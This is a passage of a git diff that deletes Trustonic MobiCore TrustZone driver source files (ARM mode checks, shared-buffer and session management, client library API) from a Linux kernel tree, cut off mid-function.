-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_ARM_H_
--#define _MC_ARM_H_
--
--#include "debug.h"
--
--#ifdef CONFIG_ARM64
--inline bool has_security_extensions(void)
--{
-- return true;
--}
--
--inline bool is_secure_mode(void)
--{
-- return false;
--}
--#else
--/*
-- * ARM Trustzone specific masks and modes
-- * Vanilla Linux is unaware of TrustZone extension.
-- * I.e. arch/arm/include/asm/ptrace.h does not define monitor mode.
-- * Also TZ bits in cpuid are not defined, ARM port uses magic numbers,
-- * see arch/arm/kernel/setup.c
-- */
--#define ARM_MONITOR_MODE (0x16) /*(0b10110)*/
--#define ARM_SECURITY_EXTENSION_MASK (0x30)
--
--/* check if CPU supports the ARM TrustZone Security Extensions */
--inline bool has_security_extensions(void)
--{
-- u32 fea = 0;
--
-- asm volatile(
-- "mrc p15, 0, %[fea], cr0, cr1, 0" :
-- [fea]"=r" (fea));
--
-- MCDRV_DBG_VERBOSE("CPU Features: 0x%X", fea);
--
-- /*
-- * If the CPU features ID has 0 for security features then the CPU
-- * doesn't support TrustZone at all!
-- */
-- if ((fea & ARM_SECURITY_EXTENSION_MASK) == 0)
-- return false;
--
-- return true;
--}
--
--/* check if running in secure mode */
--inline bool is_secure_mode(void)
--{
-- u32 cpsr = 0;
-- u32 nsacr = 0;
--
-- asm volatile(
-- "mrc p15, 0, %[nsacr], cr1, cr1, 2\n"
-- "mrs %[cpsr], cpsr\n" :
-- [nsacr]"=r" (nsacr),
-- [cpsr]"=r"(cpsr));
--
-- MCDRV_DBG_VERBOSE("CPRS.M = set to 0x%X\n", cpsr & MODE_MASK);
-- MCDRV_DBG_VERBOSE("SCR.NS = set to 0x%X\n", nsacr);
--
-- /*
-- * If the NSACR contains the reset value(=0) then most likely we are
-- * running in Secure MODE.
-- * If the cpsr mode is set to monitor mode then we cannot load!
-- */
-- if (nsacr == 0 || ((cpsr & MODE_MASK) == ARM_MONITOR_MODE))
-- return true;
--
-- return false;
--}
--#endif
--
--#endif /* _MC_ARM_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/build_tag.h b/drivers/gud/MobiCoreDriver/build_tag.h
-deleted file mode 100644
-index 51a5d3e0ae7f5..0000000000000
---- a/drivers/gud/MobiCoreDriver/build_tag.h
-+++ /dev/null
-@@ -1,15 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#define MOBICORE_COMPONENT_BUILD_TAG \
-- "t-base-QC-MSM8996-Android-302B-V001-20150529_084320_16"
-diff --git a/drivers/gud/MobiCoreDriver/client.c b/drivers/gud/MobiCoreDriver/client.c
-deleted file mode 100644
-index c8bdc07b8742d..0000000000000
---- a/drivers/gud/MobiCoreDriver/client.c
-+++ /dev/null
-@@ -1,572 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include
--#include
--#include
--#include
--#include
--#include
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--
--#include "main.h"
--#include "debug.h"
--#include "mcp.h"
--#include "mmu.h"
--#include "session.h"
--#include "client.h"
--
--/*
-- * Contiguous buffer allocated to TLCs.
-- * These buffers are used as world shared memory (wsm) to share with
-- * secure world.
-- */
--struct tbase_cbuf {
-- /* Client this cbuf belongs to */
-- struct tbase_client *client;
-- /* List element for client's list of cbuf's */
-- struct list_head list;
-- /* Number of references kept to this buffer */
-- struct kref kref;
-- /* virtual Kernel start address */
-- uintptr_t addr;
-- /* virtual Userspace start address */
-- uintptr_t uaddr;
-- /* physical start address */
-- phys_addr_t phys;
-- /* 2^order = number of pages allocated */
-- unsigned int order;
-- /* Length of memory mapped to user */
-- uint32_t len;
--};
--
--/*
-- * Map a kernel contiguous buffer to user space
-- */
--static int map_cbuf(struct vm_area_struct *vmarea, uintptr_t addr, uint32_t len,
-- uintptr_t *uaddr)
--{
-- int ret;
--
-- if (WARN(!uaddr, "No uaddr pointer available"))
-- return -EINVAL;
--
-- if (WARN(!vmarea, "No vma available"))
-- return -EINVAL;
--
-- if (WARN(!addr, "No addr available"))
-- return -EINVAL;
--
-- if (len != (uint32_t)(vmarea->vm_end - vmarea->vm_start)) {
-- MCDRV_ERROR("cbuf incompatible with vma");
-- return -EINVAL;
-- }
--
-- vmarea->vm_flags |= VM_IO;
--
-- /* CPI todo: use
io_remap_page_range() to be consistent with VM_IO ? */
-- ret = remap_pfn_range(vmarea, vmarea->vm_start,
-- page_to_pfn(virt_to_page(addr)),
-- vmarea->vm_end - vmarea->vm_start,
-- vmarea->vm_page_prot);
-- if (ret) {
-- *uaddr = 0;
-- MCDRV_ERROR("User mapping failed");
-- return ret;
-- }
--
-- *uaddr = vmarea->vm_start;
-- return 0;
--}
--
--/*
-- * Allocate and initialize a client object
-- */
--struct tbase_client *client_create(bool is_from_kernel)
--{
-- struct tbase_client *client;
--
-- /* allocate client structure */
-- client = kzalloc(sizeof(*client), GFP_KERNEL);
-- if (!client) {
-- MCDRV_ERROR("Allocation failure");
-- return NULL;
-- }
--
-- /* init members */
-- client->pid = is_from_kernel ? 0 : current->pid;
-- memcpy(client->comm, current->comm, sizeof(client->comm));
-- kref_init(&client->kref);
-- INIT_LIST_HEAD(&client->cbufs);
-- mutex_init(&client->cbufs_lock);
-- INIT_LIST_HEAD(&client->sessions);
-- mutex_init(&client->sessions_lock);
-- INIT_LIST_HEAD(&client->list);
--
-- return client;
--}
--
--/*
-- * At this point, nobody has access to the client anymore, so no new sessions
-- * are coming.
-- */
--void client_close_sessions(struct tbase_client *client)
--{
-- struct tbase_session *session;
--
-- mutex_lock(&client->sessions_lock);
-- while (!list_empty(&client->sessions)) {
-- session = list_first_entry(&client->sessions,
-- struct tbase_session, list);
--
-- /* Move session to closing sessions list */
-- mutex_lock(&g_ctx.closing_lock);
-- list_move(&session->list, &g_ctx.closing_sess);
-- mutex_unlock(&g_ctx.closing_lock);
-- /* Call session_close without lock */
-- mutex_unlock(&client->sessions_lock);
-- session_close(session);
-- mutex_lock(&client->sessions_lock);
-- }
--
-- mutex_unlock(&client->sessions_lock);
--}
--
--/*
-- * Free client object + all objects it contains.
-- * Can be called only by last user referencing the client,
-- * therefore mutex lock seems overkill
-- */
--static void client_release(struct kref *kref)
--{
-- struct tbase_client *client;
--
-- client = container_of(kref, struct tbase_client, kref);
-- kfree(client);
--}
--
--void client_put(struct tbase_client *client)
--{
-- kref_put(&client->kref, client_release);
--}
--
--/*
-- * Returns true if client is a kernel object.
-- */
--bool client_is_kernel(struct tbase_client *client)
--{
-- return !client->pid;
--}
--
--/*
-- * Set client "closing" state, only if it contains no session.
-- * Once in "closing" state, system "close" can be called.
-- * Return: true if this state could be set.
-- */
--bool client_set_closing(struct tbase_client *client)
--{
-- bool clear = false;
--
-- /* Check for sessions */
-- mutex_lock(&client->sessions_lock);
-- clear = list_empty(&client->sessions);
-- client->closing = clear;
-- mutex_unlock(&client->sessions_lock);
-- MCDRV_DBG("return %d", clear);
-- return clear;
--}
--
--/*
-- * Opens a TA and add corresponding session object to given client
-- * return: t-base driver error code
-- */
--int client_add_session(struct tbase_client *client,
-- const struct tbase_object *obj, uintptr_t tci,
-- size_t len, uint32_t *session_id, bool is_gp,
-- struct mc_identity *identity)
--{
-- struct tbase_session *session = NULL;
-- struct tbase_mmu *obj_mmu = NULL;
-- int ret = 0;
--
-- /*
-- * Create session object with temp sid=0 BEFORE session is started,
-- * otherwise if a GP TA is started and NWd session object allocation
-- * fails, we cannot handle the potentially delayed GP closing.
-- * Adding session to list must be done AFTER it is started (once we have
-- * sid), therefore it cannot be done within session_create().
-- */
-- session = session_create(client, is_gp, identity);
-- if (IS_ERR(session))
-- return PTR_ERR(session);
--
-- /* Create blob L2 table (blob is allocated by driver, so task=NULL) */
-- obj_mmu = tbase_mmu_create(NULL, obj->data, obj->length);
-- if (IS_ERR(obj_mmu)) {
-- ret = PTR_ERR(obj_mmu);
-- goto err;
-- }
--
-- /* Open session */
-- ret = session_open(session, obj, obj_mmu, tci, len);
-- /* Blob table no more needed in any case */
-- tbase_mmu_delete(obj_mmu);
-- if (ret)
-- goto err;
--
-- mutex_lock(&client->sessions_lock);
-- if (unlikely(client->closing)) {
-- /* Client has been frozen, no more sessions allowed */
-- ret = -ENODEV;
-- } else {
-- /* Add session to client */
-- list_add(&session->list, &client->sessions);
-- /* Set sid returned by SWd */
-- *session_id = session->mcp_session.id;
-- }
--
-- mutex_unlock(&client->sessions_lock);
--
--err:
-- /* Close or free session on error */
-- if (ret == -ENODEV) {
-- /* The session must enter the closing process... */
-- mutex_lock(&g_ctx.closing_lock);
-- list_add(&session->list, &g_ctx.closing_sess);
-- mutex_unlock(&g_ctx.closing_lock);
-- session_close(session);
-- } else if (ret) {
-- session_put(session);
-- }
--
-- return ret;
--}
--
--/*
-- * Remove a session object from client and close corresponding TA
-- * Return: true if session was found and closed
-- */
--int client_remove_session(struct tbase_client *client, uint32_t session_id)
--{
-- struct tbase_session *session = NULL, *candidate;
--
-- /* Move session from main list to closing list */
-- mutex_lock(&client->sessions_lock);
-- list_for_each_entry(candidate, &client->sessions, list) {
-- if (candidate->mcp_session.id == session_id) {
-- session = candidate;
-- mutex_lock(&g_ctx.closing_lock);
-- list_move(&session->list, &g_ctx.closing_sess);
-- mutex_unlock(&g_ctx.closing_lock);
-- break;
-- }
-- }
--
-- mutex_unlock(&client->sessions_lock);
--
-- /* Close session */
-- return session_close(session);
--}
--
--/*
-- * Find a
session object and increment its reference counter.
-- * Object cannot be freed until its counter reaches 0.
-- * return: pointer to the object, NULL if not found.
-- */
--struct tbase_session *client_ref_session(struct tbase_client *client,
-- uint32_t session_id)
--{
-- struct tbase_session *session = NULL, *candidate;
--
-- mutex_lock(&client->sessions_lock);
-- list_for_each_entry(candidate, &client->sessions, list) {
-- if (candidate->mcp_session.id == session_id) {
-- session = candidate;
-- session_get(session);
-- break;
-- }
-- }
--
-- mutex_unlock(&client->sessions_lock);
-- return session;
--}
--
--/*
-- * Decrement a session object's reference counter, and frees the object if it
-- * was the last reference.
-- * No lookup since session may have been removed from list
-- */
--void client_unref_session(struct tbase_session *session)
--{
-- session_put(session);
--}
--
--static inline int cbuf_info(struct tbase_cbuf *cbuf,
-- struct kasnprintf_buf *buf);
--
--int client_info(struct tbase_client *client, struct kasnprintf_buf *buf)
--{
-- struct tbase_cbuf *cbuf;
-- struct tbase_session *session;
-- int ret;
--
-- if (client->pid)
-- ret = kasnprintf(buf, "client %p: %s (%d)\n", client,
-- client->comm, client->pid);
-- else
-- ret = kasnprintf(buf, "client %p: [kernel]\n", client);
--
-- if (ret < 0)
-- return ret;
--
-- /* Buffers */
-- mutex_lock(&client->cbufs_lock);
-- if (list_empty(&client->cbufs))
-- goto done_cbufs;
--
-- list_for_each_entry(cbuf, &client->cbufs, list) {
-- ret = cbuf_info(cbuf, buf);
-- if (ret < 0)
-- goto done_cbufs;
-- }
--
--done_cbufs:
-- mutex_unlock(&client->cbufs_lock);
-- if (ret < 0)
-- return ret;
--
-- /* Sessions */
-- mutex_lock(&client->sessions_lock);
-- if (list_empty(&client->sessions))
-- goto done_sessions;
--
-- list_for_each_entry(session, &client->sessions, list) {
-- ret = session_info(session, buf);
-- if (ret < 0)
-- goto done_sessions;
-- }
--
--done_sessions:
-- mutex_unlock(&client->sessions_lock);
--
-- if (ret < 0)
-- return ret;
--
-- return 0;
--}
--
--/*
-- * This callback is called on remap
-- */
--static void cbuf_vm_open(struct vm_area_struct *vmarea)
--{
-- struct tbase_cbuf *cbuf = vmarea->vm_private_data;
--
-- tbase_cbuf_get(cbuf);
--}
--
--/*
-- * This callback is called on unmap
-- */
--static void cbuf_vm_close(struct vm_area_struct *vmarea)
--{
-- struct tbase_cbuf *cbuf = vmarea->vm_private_data;
--
-- tbase_cbuf_put(cbuf);
--}
--
--static struct vm_operations_struct cbuf_vm_ops = {
-- .open = cbuf_vm_open,
-- .close = cbuf_vm_close,
--};
--
--/*
-- * Create a cbuf object and add it to client
-- */
--int tbase_cbuf_alloc(struct tbase_client *client, uint32_t len,
-- uintptr_t *p_addr,
-- struct vm_area_struct *vmarea)
--{
-- int err = 0;
-- struct tbase_cbuf *cbuf = NULL;
-- unsigned int order;
--
-- if (WARN(!client, "No client available"))
-- return -EINVAL;
--
-- if (WARN(!len, "No len available"))
-- return -EINVAL;
--
-- order = get_order(len);
-- if (order > MAX_ORDER) {
-- MCDRV_DBG_WARN("Buffer size too large");
-- return -ENOMEM;
-- }
--
-- /* Allocate buffer descriptor structure */
-- cbuf = kzalloc(sizeof(*cbuf), GFP_KERNEL);
-- if (!cbuf) {
-- MCDRV_DBG_WARN("kzalloc failed");
-- return -ENOMEM;
-- }
--
-- /* Allocate buffer */
-- cbuf->addr = __get_free_pages(GFP_USER | __GFP_ZERO, order);
-- if (!cbuf->addr) {
-- MCDRV_DBG_WARN("get_free_pages failed");
-- kfree(cbuf);
-- return -ENOMEM;
-- }
--
-- /* Map to user space if applicable */
-- if (!client_is_kernel(client)) {
-- err = map_cbuf(vmarea, cbuf->addr, len, &cbuf->uaddr);
-- if (err) {
-- free_pages(cbuf->addr, order);
-- kfree(cbuf);
-- return err;
-- }
-- }
--
-- /* Init descriptor members */
-- cbuf->client = client;
-- cbuf->phys = virt_to_phys((void *)cbuf->addr);
-- cbuf->len = len;
-- cbuf->order = order;
-- kref_init(&cbuf->kref);
-- INIT_LIST_HEAD(&cbuf->list);
--
-- /* Keep cbuf in VMA private data for refcounting (user-space clients) */
-- if (vmarea) {
--
vmarea->vm_private_data = cbuf;
-- vmarea->vm_ops = &cbuf_vm_ops;
-- }
--
-- /* Fill return parameter for k-api */
-- if (p_addr)
-- *p_addr = cbuf->addr;
--
-- /* Get a token on the client */
-- client_get(client);
--
-- /* Add buffer to list */
-- mutex_lock(&client->cbufs_lock);
-- list_add(&cbuf->list, &client->cbufs);
-- mutex_unlock(&client->cbufs_lock);
-- MCDRV_DBG("created cbuf %p: client %p addr %lx uaddr %lx len %u",
-- cbuf, client, cbuf->addr, cbuf->uaddr, cbuf->len);
-- return err;
--}
--
--/*
-- * Remove a cbuf object from client, and mark it for freeing.
-- * Freeing will happen once all current references are released.
-- */
--int tbase_cbuf_free(struct tbase_client *client, uintptr_t addr)
--{
-- struct tbase_cbuf *cbuf = tbase_cbuf_get_by_addr(client, addr);
--
-- if (!cbuf)
-- return -EINVAL;
--
-- /* Two references to put: the caller's and the one we just took */
-- tbase_cbuf_put(cbuf);
-- tbase_cbuf_put(cbuf);
-- return 0;
--}
--
--/*
-- * Find a contiguous buffer (cbuf) in the cbuf list of given client that
-- * contains given address and take a reference on it.
-- * Return pointer to the object, or NULL if not found.
-- */
--struct tbase_cbuf *tbase_cbuf_get_by_addr(struct tbase_client *client,
-- uintptr_t addr)
--{
-- struct tbase_cbuf *cbuf = NULL, *candidate;
-- bool is_kernel = client_is_kernel(client);
--
-- mutex_lock(&client->cbufs_lock);
-- list_for_each_entry(candidate, &client->cbufs, list) {
-- /* Compare Vs kernel va OR user va depending on client type */
-- uintptr_t start = is_kernel ?
-- candidate->addr : candidate->uaddr;
-- uintptr_t end = start + candidate->len;
--
-- /* Check that (user) cbuf has not been unmapped */
-- if (!start)
-- break;
--
-- if ((addr >= start) && (addr < end)) {
-- cbuf = candidate;
-- break;
-- }
-- }
--
-- if (cbuf)
-- tbase_cbuf_get(cbuf);
--
-- mutex_unlock(&client->cbufs_lock);
-- return cbuf;
--}
--
--void tbase_cbuf_get(struct tbase_cbuf *cbuf)
--{
-- kref_get(&cbuf->kref);
--}
--
--static void cbuf_release(struct kref *kref)
--{
-- struct tbase_cbuf *cbuf = container_of(kref, struct tbase_cbuf, kref);
-- struct tbase_client *client = cbuf->client;
--
-- /* Unlist from client */
-- mutex_lock(&client->cbufs_lock);
-- list_del_init(&cbuf->list);
-- mutex_unlock(&client->cbufs_lock);
-- /* Release client token */
-- client_put(client);
-- /* Free */
-- free_pages(cbuf->addr, cbuf->order);
-- MCDRV_DBG("freed cbuf %p: client %p addr %lx uaddr %lx len %u",
-- cbuf, client, cbuf->addr, cbuf->uaddr, cbuf->len);
-- kfree(cbuf);
--}
--
--void tbase_cbuf_put(struct tbase_cbuf *cbuf)
--{
-- kref_put(&cbuf->kref, cbuf_release);
--}
--
--uintptr_t tbase_cbuf_addr(struct tbase_cbuf *cbuf)
--{
-- return cbuf->addr;
--}
--
--uintptr_t tbase_cbuf_uaddr(struct tbase_cbuf *cbuf)
--{
-- return cbuf->uaddr;
--}
--
--uint32_t tbase_cbuf_len(struct tbase_cbuf *cbuf)
--{
-- return cbuf->len;
--}
--
--static inline int cbuf_info(struct tbase_cbuf *cbuf, struct kasnprintf_buf *buf)
--{
-- return kasnprintf(buf, "\tcbuf %p: addr %lx uaddr %lx len %u\n",
-- cbuf, cbuf->addr, cbuf->uaddr, cbuf->len);
--}
-diff --git a/drivers/gud/MobiCoreDriver/client.h b/drivers/gud/MobiCoreDriver/client.h
-deleted file mode 100644
-index 3cc833eeffb87..0000000000000
---- a/drivers/gud/MobiCoreDriver/client.h
-+++ /dev/null
-@@ -1,99 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _CLIENT_H_
--#define _CLIENT_H_
--
--#include
--#include /* TASK_COMM_LEN */
--
--struct task_struct;
--struct tbase_object;
--struct tbase_session;
--
--struct tbase_client {
-- /* PID of task that opened the device, 0 if kernel */
-- pid_t pid;
-- /* Command for task*/
-- char comm[TASK_COMM_LEN];
-- /* Number of references kept to this object */
-- struct kref kref;
-- /* List of contiguous buffers allocated by mcMallocWsm for the client */
-- struct list_head cbufs;
-- struct mutex cbufs_lock; /* lock for the cbufs list */
-- /* List of tbase TA sessions opened by this client */
-- struct list_head sessions;
-- struct mutex sessions_lock; /* sessions list + closing */
-- /* Client state */
-- bool closing;
-- /* The list entry to attach to "ctx.clients" list */
-- struct list_head list;
--};
--
--struct tbase_client *client_create(bool is_from_kernel);
--
--void client_close_sessions(struct tbase_client *client);
--
--static inline void client_get(struct tbase_client *client)
--{
-- kref_get(&client->kref);
--}
--
--void client_put(struct tbase_client *client);
--
--bool client_is_kernel(struct tbase_client *client);
--
--bool client_set_closing(struct tbase_client *client);
--
--int client_add_session(struct tbase_client *client,
-- const struct tbase_object *obj, uintptr_t tci,
-- size_t len, uint32_t *p_sid, bool is_gp_uuid,
-- struct mc_identity *identity);
--
--int client_remove_session(struct tbase_client *client, uint32_t session_id);
--
--struct tbase_session *client_ref_session(struct
tbase_client *client, -- uint32_t session_id); -- --void client_unref_session(struct tbase_session *session); -- --int client_info(struct tbase_client *client, struct kasnprintf_buf *buf); -- --/* -- * Contiguous buffer allocated to TLCs. -- * These buffers are uses as world shared memory (wsm) and shared with -- * secure world. -- * The virtual kernel address is added for a simpler search algorithm. -- */ --struct tbase_cbuf; -- --int tbase_cbuf_alloc(struct tbase_client *client, uint32_t len, -- uintptr_t *addr, struct vm_area_struct *vmarea); -- --int tbase_cbuf_free(struct tbase_client *client, uintptr_t addr); -- --struct tbase_cbuf *tbase_cbuf_get_by_addr(struct tbase_client *client, -- uintptr_t addr); -- --void tbase_cbuf_get(struct tbase_cbuf *cbuf); -- --void tbase_cbuf_put(struct tbase_cbuf *cbuf); -- --uintptr_t tbase_cbuf_addr(struct tbase_cbuf *cbuf); -- --uintptr_t tbase_cbuf_uaddr(struct tbase_cbuf *cbuf); -- --uint32_t tbase_cbuf_len(struct tbase_cbuf *cbuf); -- --#endif /* _CLIENT_H_ */ -diff --git a/drivers/gud/MobiCoreDriver/clientlib.c b/drivers/gud/MobiCoreDriver/clientlib.c -deleted file mode 100644 -index c7d6d023b3a80..0000000000000 ---- a/drivers/gud/MobiCoreDriver/clientlib.c -+++ /dev/null -@@ -1,433 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */
--
--#include
--#include
--#include
--#include
--#include
--#include
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--#include "public/mobicore_driver_api.h"
--
--#include "main.h"
--#include "debug.h"
--#include "client.h"
--#include "session.h"
--#include "api.h"
--
--enum mc_result convert(int err)
--{
-- switch (-err) {
-- case 0:
-- return MC_DRV_OK;
-- case ENOMSG:
-- return MC_DRV_NO_NOTIFICATION;
-- case EBADMSG:
-- return MC_DRV_ERR_NOTIFICATION;
-- case EAGAIN:
-- return MC_DRV_ERR_OUT_OF_RESOURCES;
-- case EHOSTDOWN:
-- return MC_DRV_ERR_INIT;
-- case ENODEV:
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
-- case ENXIO:
-- return MC_DRV_ERR_UNKNOWN_SESSION;
-- case EPERM:
-- return MC_DRV_ERR_INVALID_OPERATION;
-- case EBADE:
-- return MC_DRV_ERR_INVALID_RESPONSE;
-- case ETIME:
-- return MC_DRV_ERR_TIMEOUT;
-- case ENOMEM:
-- return MC_DRV_ERR_NO_FREE_MEMORY;
-- case EUCLEAN:
-- return MC_DRV_ERR_FREE_MEMORY_FAILED;
-- case ENOTEMPTY:
-- return MC_DRV_ERR_SESSION_PENDING;
-- case EHOSTUNREACH:
-- return MC_DRV_ERR_DAEMON_UNREACHABLE;
-- case ENOENT:
-- return MC_DRV_ERR_INVALID_DEVICE_FILE;
-- case EINVAL:
-- return MC_DRV_ERR_INVALID_PARAMETER;
-- case EPROTO:
-- return MC_DRV_ERR_KERNEL_MODULE;
-- case EADDRINUSE:
-- return MC_DRV_ERR_BULK_MAPPING;
-- case EADDRNOTAVAIL:
-- return MC_DRV_ERR_BULK_UNMAPPING;
-- case ECOMM:
-- return MC_DRV_INFO_NOTIFICATION;
-- case EUNATCH:
-- return MC_DRV_ERR_NQ_FAILED;
-- default:
-- MCDRV_DBG("error is %d", err);
-- return MC_DRV_ERR_UNKNOWN;
-- }
--}
--
--static inline bool is_valid_device(uint32_t device_id)
--{
-- return MC_DEVICE_ID_DEFAULT == device_id;
--}
--
--static struct tbase_client *client;
--static int open_count;
--static DEFINE_MUTEX(dev_mutex); /* Lock for the device */
--
--static bool clientlib_client_get(void)
--{
-- int ret = true;
--
-- mutex_lock(&dev_mutex);
-- if (!client)
-- ret = false;
-- else
-- client_get(client);
--
-- mutex_unlock(&dev_mutex);
-- return ret;
--}
--
--static void clientlib_client_put(void)
--{
-- mutex_lock(&dev_mutex);
-- client_put(client);
-- mutex_unlock(&dev_mutex);
--}
--
--enum mc_result mc_open_device(uint32_t device_id)
--{
-- enum mc_result mc_result = MC_DRV_OK;
--
-- /* Check parameters */
-- if (!is_valid_device(device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- mutex_lock(&dev_mutex);
-- if (!open_count)
-- client = api_open_device(true);
--
-- if (client) {
-- open_count++;
-- MCDRV_DBG("Successfully opened the device.");
-- } else {
-- mc_result = MC_DRV_ERR_INVALID_DEVICE_FILE;
-- MCDRV_DBG("Could not open device");
-- }
--
-- mutex_unlock(&dev_mutex);
-- return mc_result;
--}
--EXPORT_SYMBOL(mc_open_device);
--
--enum mc_result mc_close_device(uint32_t device_id)
--{
-- enum mc_result mc_result = MC_DRV_OK;
--
-- /* Check parameters */
-- if (!is_valid_device(device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- mutex_lock(&dev_mutex);
-- if (!client) {
-- mc_result = MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
-- goto end;
-- }
--
-- if (open_count > 1) {
-- open_count--;
-- goto end;
-- }
--
-- /* Check sessions and freeze client */
-- mc_result = convert(api_freeze_device(client));
-- if (MC_DRV_OK != mc_result)
-- goto end;
--
-- /* Close the device */
-- api_close_device(client);
-- client = NULL;
-- open_count = 0;
--
--end:
-- mutex_unlock(&dev_mutex);
-- return mc_result;
--}
--EXPORT_SYMBOL(mc_close_device);
--
--enum mc_result mc_open_session(struct mc_session_handle *session,
-- const struct mc_uuid_t *uuid,
-- uint8_t *tci, uint32_t len)
--{
-- struct mc_identity identity = {
-- .login_type = TEEC_LOGIN_PUBLIC,
-- };
-- enum mc_result ret;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_open_session(client, &session->session_id, uuid,
-- (uintptr_t)tci, len, false, &identity));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_open_session);
--
--enum mc_result mc_open_trustlet(struct mc_session_handle *session,
-- uint32_t spid,
-- uint8_t *trustlet, uint32_t trustlet_len,
-- uint8_t *tci, uint32_t len)
--{
-- enum mc_result ret;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_open_trustlet(client, &session->session_id, spid,
-- (uintptr_t)trustlet, trustlet_len,
-- (uintptr_t)tci, len));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_open_trustlet);
--
--enum mc_result mc_close_session(struct mc_session_handle *session)
--{
-- enum mc_result ret;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_close_session(client, session->session_id));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_close_session);
--
--enum mc_result mc_notify(struct mc_session_handle *session)
--{
-- enum mc_result ret;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_notify(client, session->session_id));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_notify);
--
--enum mc_result mc_wait_notification(struct mc_session_handle *session,
-- int32_t timeout)
--{
-- enum mc_result ret;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_wait_notification(client, session->session_id,
-- timeout));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_wait_notification);
--
--enum mc_result mc_malloc_wsm(uint32_t device_id, uint32_t align, uint32_t len,
-- uint8_t **wsm, uint32_t wsm_flags)
--{
-- enum mc_result ret;
-- uintptr_t va;
--
-- /* Check parameters */
-- if (!is_valid_device(device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!len)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!wsm)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_malloc_cbuf(client, len, &va, NULL));
-- if (ret == MC_DRV_OK)
-- *wsm = (uint8_t *)va;
--
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_malloc_wsm);
--
--enum mc_result mc_free_wsm(uint32_t device_id, uint8_t *wsm)
--{
-- enum mc_result ret;
-- uintptr_t va = (uintptr_t)wsm;
--
-- /* Check parameters */
